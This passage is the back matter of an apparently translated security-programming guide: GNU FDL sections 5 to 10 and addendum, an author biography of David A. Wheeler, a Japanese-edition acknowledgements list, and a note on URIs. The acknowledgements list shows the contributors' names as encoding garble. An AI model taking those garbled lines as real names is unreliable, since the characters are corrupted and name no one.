    behalf of, you may not add another; but you may replace the old
    one, on explicit permission from the previous publisher that added
    the old one.
   
    The author(s) and publisher(s) of the Document do not by this
    License give permission to use their names for publicity for or to
     assert or imply endorsement of any Modified Version.
   
5. COMBINING DOCUMENTS
   
    You may combine the Document with other documents released under
    this License, under the terms defined in section 4 above for
    modified versions, provided that you include in the combination all
    of the Invariant Sections of all of the original documents,
    unmodified, and list them all as Invariant Sections of your
    combined work in its license notice.
   
    The combined work need only contain one copy of this License, and
    multiple identical Invariant Sections may be replaced with a single
    copy. If there are multiple Invariant Sections with the same name
    but different contents, make the title of each such section unique
    by adding at the end of it, in parentheses, the name of the
    original author or publisher of that section if known, or else a
    unique number. Make the same adjustment to the section titles in
    the list of Invariant Sections in the license notice of the
    combined work.
   
    In the combination, you must combine any sections entitled
    "History" in the various original documents, forming one section
    entitled "History"; likewise combine any sections entitled
    "Acknowledgements", and any sections entitled "Dedications". You
    must delete all sections entitled "Endorsements."
   
6. COLLECTIONS OF DOCUMENTS
   
    You may make a collection consisting of the Document and other
    documents released under this License, and replace the individual
    copies of this License in the various documents with a single copy
    that is included in the collection, provided that you follow the
    rules of this License for verbatim copying of each of the documents
    in all other respects.
   
    You may extract a single document from such a collection, and
    distribute it individually under this License, provided you insert
    a copy of this License into the extracted document, and follow this
    License in all other respects regarding verbatim copying of that
    document.
   
7. AGGREGATION WITH INDEPENDENT WORKS
   
    A compilation of the Document or its derivatives with other
    separate and independent documents or works, in or on a volume of a
     storage or distribution medium, does not as a whole count as a
    Modified Version of the Document, provided no compilation copyright
    is claimed for the compilation. Such a compilation is called an
    "aggregate", and this License does not apply to the other
     self-contained works thus compiled with the Document, on account
    of their being thus compiled, if they are not themselves derivative
    works of the Document. If the Cover Text requirement of section 3
    is applicable to these copies of the Document, then if the Document
     is less than one quarter of the entire aggregate, the Document's
    Cover Texts may be placed on covers that surround only the Document
    within the aggregate. Otherwise they must appear on covers around
    the whole aggregate.
   
8. TRANSLATION
   
    Translation is considered a kind of modification, so you may
    distribute translations of the Document under the terms of section
    4. Replacing Invariant Sections with translations requires special
    permission from their copyright holders, but you may include
    translations of some or all Invariant Sections in addition to the
    original versions of these Invariant Sections. You may include a
    translation of this License provided that you also include the
    original English version of this License. In case of a disagreement
    between the translation and the original English version of this
    License, the original English version will prevail.
   
9. TERMINATION
   
    You may not copy, modify, sublicense, or distribute the Document
    except as expressly provided for under this License. Any other
    attempt to copy, modify, sublicense or distribute the Document is
    void, and will automatically terminate your rights under this
    License. However, parties who have received copies, or rights, from
    you under this License will not have their licenses terminated so
    long as such parties remain in full compliance.
   
10. FUTURE REVISIONS OF THIS LICENSE
   
    The Free Software Foundation <http://www.gnu.org/fsf/fsf.html> may
    publish new, revised versions of the GNU Free Documentation License
    from time to time. Such new versions will be similar in spirit to
    the present version, but may differ in detail to address new
     problems or concerns. See http://www.gnu.org/copyleft/.
   
    Each version of the License is given a distinguishing version
    number. If the Document specifies that a particular numbered
    version of this License "or any later version" applies to it, you
    have the option of following the terms and conditions either of
    that specified version or of any later version that has been
     published (not as a draft) by the Free Software Foundation. If the
    Document does not specify a version number of this License, you may
    choose any version ever published (not as a draft) by the Free
    Software Foundation.
   
Addendum
   
    To use this License in a document you have written, include a copy
    of the License in the document and put the following copyright and
    license notices just after the title page:
   
    Copyright YEAR YOUR NAME.
   
    Permission is granted to copy, distribute and/or modify this
    document under the terms of the GNU Free Documentation License,
    Version 1.1 or any later version published by the Free Software
    Foundation; with the Invariant Sections being LIST THEIR TITLES,
    with the Front-Cover Texts being LIST, and with the Back-Cover
    Texts being LIST. A copy of the license is included in the section
    entitled "GNU Free Documentation License".
   
    If you have no Invariant Sections, write "with no Invariant
    Sections" instead of saying which ones are invariant. If you have
    no Front-Cover Texts, write "no Front-Cover Texts" instead of
    "Front-Cover Texts being LIST"; likewise for Back-Cover Texts.
   
    If your document contains nontrivial examples of program code, we
    recommend releasing these examples in parallel under your choice of
    free software license, such as the GNU General Public License
    <http://www.gnu.org/copyleft/gpl.html>, to permit their use in free
    software.
   
     [Translator's note: for a Japanese version, refer to the Japanese
     translation of the GNU FDL published by OSG-JP
     <http://www.opensource.jp/fdl/fdl.ja.txt>.]
   

Appendix E. About the Author

David A. Wheeler is an expert in computer security and has long
specialized in development techniques for large and high-risk software
systems. He has been involved in software development since the
mid-1970s, and been involved with Unix and computer security since the
early 1980s. His areas of knowledge include computer security, software
safety, vulnerability analysis, inspections, Internet technologies,
software-related standards (including POSIX), real-time software
development techniques, and numerous computer languages (including Ada,
C, C++, Perl, Python, and Java).

Mr. Wheeler is co-author and lead editor of the IEEE book Software
Inspection: An Industry Best Practice, author of the book Ada95: The
Lovelace Tutorial, and co-author of the GNOME User's Guide. He is also
the author of many smaller papers and articles, including the Linux
Program Library HOWTO.

Mr. Wheeler hopes that, by making this document available, other
developers will make their software more secure. You can reach him by
email at dwheeler@dwheeler.com (no spam please), and you can also see
his web site at http://www.dwheeler.com. [Translator's note: this "About
the Author" section is designated an Invariant Section under the GNU
FDL, so it is reproduced here unchanged.]


Appendix F. Acknowledgements for the Japanese Edition

The following people helped us in the course of this translation, and we
express our thanks here. Thank you, everyone!

 E Mk
   
 E 䂫Ђ
   
 E p͂
   
 E L
   
 E щT
   
 E MF
   
 E R`V
   
 E {Jv
   
Notes

[1] Technically, in hypertext terminology this is a "uniform resource
    identifier" (URI). A "Uniform Resource Locator" (URL) is the subset
    of URIs that identifies a resource by representing how it is
    accessed (for example, its "location" on the network); other kinds
    of URI identify a resource by its name or other attributes. "URL"
    and "URI" are often used with the same meaning, and URLs are by far
    the most common kind of URI in actual use; for example, the encoding
    used in URIs is commonly called "URL encoding".
